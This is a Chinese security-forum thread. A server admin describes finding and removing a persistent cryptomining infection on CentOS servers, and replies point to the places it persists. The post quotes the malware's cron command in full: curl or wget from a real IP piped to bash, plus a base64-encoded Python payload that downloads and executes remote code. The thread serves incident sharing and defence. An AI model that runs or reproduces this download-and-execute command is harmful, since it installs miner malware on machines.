吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 12195|回复: 108
收起左侧

[分享] centOS上删不掉的脚本,服务器秒变矿机

  [复制链接]
fht000 发表于 2020-11-11 18:36
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 fht000 于 2020-11-11 19:32 编辑

上个月接手了几台服务器,上面主要是部署了一套springcloud服务,用了docker镜像部署,使用rancher管理服务器和容器.
接手几天后发现页面访问越来越卡,直到有一天直接404了,上服务器上排查,发现rancher已经停止,服务器上还一直报你有一条邮件的消息,不过是英文的,再次排查后发现CPU和内存大量占用.
执行top命令总算发现了这个东西.....
image.png

如果没猜错,这个应该就是所谓的挖矿程序了!
[url=]好吧,本以为找到了以后就好处理了,接下来就去找找它再哪里......[/url]
image.png
这个貌似显示已经是被删除的,没遇到过,找度娘吧.....
经过一同照搬操作发现好多地方都有这个东西下过来的定时任务脚本
image.png

image.png
打开这些文件之后发现都有定时任务执行......
image.png
image.png
image.png
本来想着,把定时任务执行一次(curl -s http://198.98.57.217/xmi||wget -q -O - http://198.98.57.217/xmi)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi,然后按照下载过来的脚本,查看下载过来的文件,然后一个个删除,结果却发现我root账户没有权限,[/url]chmod完全不起作用......
在百度查了几篇博客,如这个https://blog.csdn.net/deeplearnings/article/details/77367509,都说需要用chattr命令,然后好不容易删除,再去执行top命令,发现第一张图上的情况没到10秒钟又出现了,再去之前查到脚本文件并删除的地方看.一切被删文件恢复原样,然后就是心态快炸的过程......
最后到查看防火墙和iptables发现所有端口对外开放......
没办法只好用最野蛮的办法了,备份数据库重装系统,配置ip白名单规则,这个世界总算清净了!!!
本来还想附上执行定时任务命令后执行命令行文件一份,有兴趣的童鞋可以看看,结果发现传不上来
结语:新人第一次发帖,文笔不好,请多包涵,服务器还是要提前配置安全规则,亡羊补牢就太晚了!不过我是接受被人的,这样的事情没法杜绝了...




谢谢各位,帖子图片以及改过来了
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png

免费评分

参与人数 20吾爱币 +17 热心值 +18 收起 理由
玄学不可说 + 1 热心回复!
julydate + 1 + 1 我很赞同!
假助天下第一 + 1 + 1 热心回复!
jfjfhajj + 1 + 1 我很赞同!
limo001 + 1 + 1 我很赞同!
hackAll + 1 我很赞同!
小迷糊 + 1 + 1 我很赞同!
Plutonium_141 + 1 + 1 热心回复!
xz的冰镇西瓜 + 1 + 1 很适合新手,赞!
fengbolee + 1 + 1 用心讨论,共获提升!
eihouwang001 + 1 + 1 谢谢@Thanks!
oxxo119 + 1 + 1 谢谢@Thanks!
Woodrow + 1 + 1 用心讨论,共获提升!
tocabd + 1 + 1 热心回复!
Fade、小萝卜 + 1 + 1 我很赞同!
悠然地2012 + 1 + 1 热心回复!
lucid + 1 我很赞同!
kinghonour + 1 + 1 谢谢@Thanks!
AKB0048110 + 1 我很赞同!
ganjuelianghao + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

chmod755 发表于 2020-11-13 11:20
楼主,我建议你再看看,没啥意外的话你还是没有清理干净
ps -ef |grep urllib       这个是病毒用python去下载后续文件

ps -ef |grep perl        同理,用perl下载

cd  /tmp/.pwn     你看到的那个dbused是从这个文件夹里拷贝过去的

crontab -e     计划任务

vi /root/.bash_profile     病毒写到了开机自启动里
lg99 发表于 2020-11-11 19:15
fht000 发表于 2020-11-11 19:04
学到了,第一次发帖没经验,还没有预览和重编,错了也没法子改

错了可以改的,帖子一个月内都可以编辑
正己 发表于 2020-11-11 18:59
在你要插入图片的位置点一下,再点图片,就可以把图片插入
 楼主| fht000 发表于 2020-11-11 19:04
正己 发表于 2020-11-11 18:59
在你要插入图片的位置点一下,再点图片,就可以把图片插入

学到了,第一次发帖没经验,还没有预览和重编,错了也没法子改
wysyz 发表于 2020-11-11 19:22
错了可以改的
longle 发表于 2020-11-11 20:01
哦哦哦 +1
DCQ19890209 发表于 2020-11-11 20:02
感谢楼主分享 收藏了 学习一下
efujin 发表于 2020-11-11 20:04
图片是不是重复发了一遍?
 楼主| fht000 发表于 2020-11-11 20:06
efujin 发表于 2020-11-11 20:04
图片是不是重复发了一遍?

下面的多出来的,好像没法删
efujin 发表于 2020-11-11 20:25
本帖最后由 efujin 于 2020-11-11 20:29 编辑
fht000 发表于 2020-11-11 20:06
下面的多出来的,好像没法删

你上传到附件里了
把附件里的图片都删掉即可。
1.jpg

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 08:35

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表